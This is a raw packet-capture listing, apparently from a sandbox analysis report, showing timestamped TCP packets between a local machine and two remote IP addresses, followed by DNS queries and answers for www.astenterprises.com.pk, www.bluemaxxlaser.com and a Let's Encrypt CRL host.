                                                                                        Dec 19, 2024 12:45:12.508233070 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.508240938 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.508258104 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.629827023 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.629854918 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.629926920 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.629952908 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.629993916 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.670151949 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.670190096 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.670236111 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.670262098 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.670284986 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.670305967 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.800324917 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.800352097 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.800416946 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.800451994 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.800465107 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.800483942 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.830082893 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.830110073 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.830158949 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.830183983 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.830202103 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.830224991 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.858566046 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.858588934 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.858649969 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.858669043 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.858694077 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.858712912 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.977715015 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.977739096 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.977798939 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.977821112 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.977876902 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.996541977 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.996562958 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.996623039 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.996654034 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:12.996675014 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:12.996697903 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.016822100 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.016841888 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.016904116 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.016933918 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.016982079 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.037031889 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.037055016 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.037101984 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.037123919 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.037143946 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.037168026 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.054408073 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.054434061 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.054486036 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.054503918 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.054523945 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.054542065 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.076014996 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.076040030 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.076086044 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.076097965 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.076136112 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.165328026 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.165358067 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.165559053 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.165584087 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.165623903 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.179791927 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.179812908 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.179925919 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.179956913 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.180010080 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.194066048 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.194119930 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.194169998 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.194184065 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.194200993 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.194226980 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.207250118 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.207271099 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.207330942 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.207340956 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.207372904 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.218542099 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.218566895 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.218611002 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.218621969 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.218640089 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.218656063 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.231791019 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.231813908 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.231873989 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.231884956 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.231923103 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.243338108 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.243361950 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.243436098 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.243448019 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.243485928 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.255426884 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.255446911 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.255530119 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.255548000 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.255592108 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.359673977 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.359697104 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.359833956 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.359862089 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.359904051 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.367681980 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.367702007 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.367779970 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.367794991 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.367829084 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.376267910 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.376290083 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.376373053 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.376389027 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.376424074 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.384342909 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.384358883 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.384417057 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.384424925 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.384464025 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.391381025 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.391397953 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.391442060 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.391450882 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.391472101 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.391489983 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.400043011 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.400088072 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.400146961 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.400162935 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.400172949 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.400197983 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.408121109 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.408158064 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.408226967 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.408235073 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.408268929 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.408289909 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.416327000 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.416357040 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.416465998 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.416479111 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.416516066 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.550626040 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.550657034 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.550793886 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.550811052 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.550842047 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.557523966 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.557548046 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.557602882 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.557610989 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.557631969 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.557657003 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.564655066 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.564678907 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.564729929 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.564737082 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.564762115 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.571104050 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.571126938 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.571204901 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.571214914 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.571244955 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.578212976 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.578236103 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.578299046 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.578310966 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.578341961 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.585129023 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.585151911 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.585199118 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.585207939 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.585237980 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.592345953 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.592371941 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.592423916 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.592434883 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.592467070 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.598916054 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.598941088 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.599020004 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.599031925 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.599062920 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.743436098 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.743468046 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.743519068 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.743534088 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.743552923 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.743570089 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.750298023 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.750325918 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.750385046 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.750394106 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.750413895 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.750427008 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.756725073 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.756793976 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.756829977 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.756839991 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.756882906 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.764055014 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.764106989 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.764139891 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.764147997 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.764170885 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.764192104 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.770838022 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.770883083 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.771025896 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.771035910 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.771285057 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.777719021 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.777764082 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.777801991 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.777815104 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.777834892 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.777856112 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.785574913 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.785630941 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.785661936 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.785693884 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.785706997 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.787350893 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.792589903 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.792651892 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.792668104 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.792679071 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.792690992 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.792721033 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.936774969 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.936811924 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.936908960 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.936939001 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.937263966 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.943006039 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.943031073 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.943075895 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.943110943 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.943128109 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.943156004 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.950766087 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.950812101 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.950841904 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.950865030 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.950880051 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.950984001 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.958039045 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.958070993 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.958125114 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.958142996 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.958165884 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.958178997 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.963505983 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.963545084 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.963588953 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.963617086 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.963629961 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.963660955 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.970040083 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.970071077 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.970145941 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.970155954 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.970271111 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.976393938 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.976422071 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.976485968 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.976497889 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.976676941 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.983541965 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.983566999 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.983628988 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.983639002 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.983685970 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.983700037 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.128093958 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.128130913 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.128185034 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.128202915 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.128232002 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.128247023 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.129410028 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.129477978 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.129483938 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.129499912 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.129545927 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.132249117 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.489430904 CET4972380192.168.2.10203.175.174.69
                                                                                        Dec 19, 2024 12:45:14.610332966 CET8049723203.175.174.69192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.610477924 CET4972380192.168.2.10203.175.174.69
                                                                                        Dec 19, 2024 12:45:14.610598087 CET4972380192.168.2.10203.175.174.69
                                                                                        Dec 19, 2024 12:45:14.731065035 CET8049723203.175.174.69192.168.2.10
                                                                                        Dec 19, 2024 12:45:16.145333052 CET8049723203.175.174.69192.168.2.10
                                                                                        Dec 19, 2024 12:45:16.186532974 CET4972380192.168.2.10203.175.174.69
                                                                                        Dec 19, 2024 12:45:20.135588884 CET4972380192.168.2.10203.175.174.69

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 19, 2024 12:45:10.519990921 CET6531753192.168.2.101.1.1.1
                                                                                        Dec 19, 2024 12:45:10.659085035 CET53653171.1.1.1192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.282329082 CET5795553192.168.2.101.1.1.1
                                                                                        Dec 19, 2024 12:45:14.488712072 CET53579551.1.1.1192.168.2.10
                                                                                        Dec 19, 2024 12:45:24.679056883 CET6053253192.168.2.101.1.1.1

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 19, 2024 12:45:10.519990921 CET192.168.2.101.1.1.10x12ebStandard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:45:14.282329082 CET192.168.2.101.1.1.10xadbcStandard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:45:24.679056883 CET192.168.2.101.1.1.10xe4b1Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 19, 2024 12:45:10.659085035 CET1.1.1.1192.168.2.100x12ebNo error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 19, 2024 12:45:10.659085035 CET1.1.1.1192.168.2.100x12ebNo error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:45:14.488712072 CET1.1.1.1192.168.2.100xadbcNo error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:45:24.818532944 CET1.1.1.1192.168.2.100xe4b1No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 19, 2024 12:46:51.791292906 CET1.1.1.1192.168.2.100x93b3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
